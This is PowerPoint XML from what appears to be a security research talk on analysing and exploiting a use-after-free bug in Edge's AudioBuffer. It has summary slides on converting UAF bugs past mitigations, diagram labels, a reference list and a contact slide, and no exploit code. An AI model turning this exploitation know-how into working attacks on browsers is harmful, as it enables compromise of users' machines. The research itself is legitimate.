      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7067538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06</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3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Summary</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"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17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E7E1ED-C593-480B-A495-2C813C633EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230525" y="27030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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A6B3B5-1F45-49CD-AE51-C82856434CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230524" y="4074749"/>
            <a:ext cx="10953455" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Although many UAF vulnerabilities have become unusable with the introduction of isolation stacks, delayed release, MEMGC and other mitigation, some high-quality UAFs can still be exploit. The key point of exploitation is how to convert UAF into other types of vulnerabilities through some techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Various web technologies, such as Web Audio, WebGL, WebRTC, etc., due to the complexity of their implementation, are high-profile exploits, especially in the areas related to web technologies and JS features.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8008527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06</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pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Q&amp;A and Acknowledgements</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17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E7E1ED-C593-480B-A495-2C813C633EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230525" y="27030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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A6B3B5-1F45-49CD-AE51-C82856434CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230525" y="5753424"/>
            <a:ext cx="10953455" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Welcome to send questions to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>jin_liu@mcafee.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thanks to the McAfee IPS Security Research Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18479044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06</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pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>References</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B098E65-ECE3-494F-B54B-FD000064341C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="10953455" cy="7684169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E7E1ED-C593-480B-A495-2C813C633EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230525" y="27030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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A6B3B5-1F45-49CD-AE51-C82856434CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230525" y="3610725"/>
            <a:ext cx="10953455" cy="7478970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://bbs.pediy.com/thread-211277.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://blog.exodusintel.com/2013/11/26/browser-weakest-byte/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.zerodayinitiative.com/advisories/ZDI-18-571/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.zerodayinitiative.com/advisories/ZDI-18-612/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://developer.mozilla.org/zh-CN/docs/Web/API/Web_Audio_API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://developer.mozilla.org/zh-CN/docs/learn/WebGL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://developer.mozilla.org/zh-CN/docs/Glossary/WebRTC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://powerofcommunity.net/poc2017/andrew.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571453" indent="-571453">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1759067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826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D228B60F-5ECA-4100-A423-EB0E0793AD8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="10953455" cy="7684169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="9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7734">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC787F47-9B33-43B0-A482-6B53312A8A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1398018" y="885369"/>
            <a:ext cx="10313668" cy="1028895"/>
            <a:chOff x="383732" y="683783"/>
            <a:chExt cx="12098995" cy="1397618"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="平行四边形 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8872ECCE-64FB-4797-861E-365495ED560E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="383732" y="683783"/>
              <a:ext cx="1629722" cy="1397618"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="none" lIns="189000" tIns="94500" rIns="189000" bIns="94500" anchor="ctr" anchorCtr="1" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="4961" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="50000"/>
                      <a:lumOff val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="SimHei" charset="-122"/>
                  <a:ea typeface="SimHei" charset="-122"/>
                  <a:cs typeface="SimHei" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="平行四边形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72F9CDF5-BD41-4B9F-8469-098C0D81268D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1853032" y="683783"/>
              <a:ext cx="10629695" cy="1397618"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="square" lIns="189000" tIns="94500" rIns="189000" bIns="94500" anchor="ctr" anchorCtr="1" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Edge </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>AudioBuffer</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and Exploitation : Vulnerability Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形: 圆角 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D249879-B846-4B81-B6EC-037DE5CE7064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326758" y="3251200"/>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mn-ea"/>
              </a:rPr>
              <a:t>var_copyfromchannel</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接箭头连接符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC22EE16-C6A2-4B9B-B7AF-F5DF0F78A00F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787258" y="4140200"/>
            <a:ext cx="0" cy="66040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11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA5C781-1798-4B4F-888A-6B492F0B5311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326758" y="4776629"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形: 圆角 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{215DC927-124A-4FF2-A921-DCF1FBB72530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096591" y="3791665"/>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mn-ea"/>
              </a:rPr>
              <a:t>Float32Array.buffer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形: 圆角 12">
            <a:extLst>
